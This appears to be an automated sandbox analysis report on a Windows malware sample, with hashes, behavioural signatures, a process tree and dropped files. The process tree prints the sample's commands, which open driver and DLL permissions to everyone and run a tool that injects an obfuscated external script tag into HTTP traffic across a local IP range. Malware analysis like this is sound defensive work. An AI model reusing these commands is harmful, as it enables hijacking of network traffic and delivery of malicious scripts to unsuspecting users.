Analysis

  • max time kernel
    135s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-08-2024 15:01

General

  • Target

    b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe

  • Size

    525KB

  • MD5

    b817832560fca5244ef3393152e3c7a8

  • SHA1

    094de5817d77cef6339100698cf4c3df965383e2

  • SHA256

    5f15488a7e355492829edaf3a8755619384dc725aa836eff1f3d364d5719e772

  • SHA512

    9ae2333af910fe0ef90fdf125e6b99c88fc2a46881341ff2b55ed32dc862b7e88756fd69def7410911b72e6b1b1c6f6be64c97bae3f60c80b07e9076727c9094

  • SSDEEP

    6144:EhcMSbFohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QMgNoS4:ESNF2E9/cZw/X6eSPtfS6G6IgNoS4

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 5 IoCs
  • Drops file in System32 directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\b817832560fca5244ef3393152e3c7a8_JaffaCakes118.exe"
    1⤵
    • Drops file in Drivers directory
    • Checks computer location settings
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2880
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\drivers\npf.sys /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4884
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\Packet.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1888
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\WanPacket.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2364
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\wpcap.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1184
    • C:\Windows\SysWOW64\cacls.exe
      "C:\Windows\system32\cacls.exe" C:\Windows\system32\npptools.dll /e /p everyone:f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1348
    • C:\Windows\SysWOW64\360uczq.exe
      -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://c%61d.K%77%69k.%54o/tj.js></script>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • System Location Discovery: System Language Discovery
      PID:4324
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 12.bat
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4052

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\12.bat

    Filesize

    2KB

    MD5

    879d75bc6bed2e1f30abd91f361f66b9

    SHA1

    4a5bb4b3dcd6ec251486ad4040e47e4bf566391f

    SHA256

    b843640f36bad63e06b554fcf02c6485bf4a9fe085484dfe5a6d90adbfa81a36

    SHA512

    ac55885e35577a2d1f5ab4a7ba35135cf163616f489cf0849fe5ed9b0e8e1e2f6573be8c3d95f8deca7fecc7b3452888d40c930bee2eca99149db167dd6d4a95

  • C:\Windows\SysWOW64\360uczq.exe

    Filesize

    8.0MB

    MD5

    a9c6fe21771bce09fe8f82dd463e8863

    SHA1

    b18aa37b478bd3facde96f2250a18647846b8a60

    SHA256

    8c6dcfb66910948270114d1dc1e272f1158d149e49873de02bb1a9cc1f78b991

    SHA512

    1e4abecbeb1750ab037fd4bef1b4b686dce96580a7efba7ee7189e6269e6a6cc62df9bb795dec2a08d59772bfa074e3331c821b04c6ab040bc2aba5263a24f69

  • C:\Windows\SysWOW64\Packet.dll

    Filesize

    86KB

    MD5

    9062aeea8cbfc4f0780bbbefad7cebcb

    SHA1

    c4ad39ec51ad0e84fe58f62931d13cddfde3189e

    SHA256

    b2535129b26366484c487cc2ce536d8fcfa9d1ac1dab0db9560b4532012c352c

    SHA512

    60957548fc2272998aea518acf3b1812ed77f73e960a99ddf0d6b474b0858225286c26554bf81c00acf3cb1c77c5ce458d80e149ed4766287d7e32af9681e646

  • C:\Windows\SysWOW64\WanPacket.dll

    Filesize

    66KB

    MD5

    fdd104a9fd3427a1df37041fa947a041

    SHA1

    cca1881a3c02033008f78cc39b712b637c7f3e13

    SHA256

    384e928f13bc1c25ca16b3247d7ca942aec6834fadb05b1487f2c975678d4a9a

    SHA512

    9dd082eb245b443cc75b37c69f0a17e15fcb9cdb676b058d87f9805ec7a928e721a681b940fcdd56fd81da4d308f0d514870c526c4f9c715b256a97ab6bb29f7

  • C:\Windows\SysWOW64\wpcap.dll

    Filesize

    234KB

    MD5

    ce842d25e5b7e6ff21a86cad9195fbe8

    SHA1

    d762270be089a89266b012351b52c595e260b59b

    SHA256

    7e8c0119f352424c61d6fad519394924b7aedbf8bfb3557d53c2961747d4c7f3

    SHA512

    84c23addda6ff006d4a3967b472af10a049b2a045d27d988d22153fc3ba517e21520a31eb061a2ef2abf302e365564dd4601d240ec3d5894fb96f10a9fae97d6

  • memory/2880-0-0x0000000000400000-0x0000000000485000-memory.dmp

    Filesize

    532KB

  • memory/2880-1-0x0000000000400000-0x0000000000485000-memory.dmp

    Filesize

    532KB

  • memory/2880-24-0x0000000000400000-0x0000000000485000-memory.dmp

    Filesize

    532KB

  • memory/4324-9-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

  • memory/4324-20-0x0000000000490000-0x00000000004A0000-memory.dmp

    Filesize

    64KB

  • memory/4324-21-0x0000000000400000-0x000000000040F000-memory.dmp

    Filesize

    60KB

  • memory/4324-16-0x0000000000430000-0x0000000000445000-memory.dmp

    Filesize

    84KB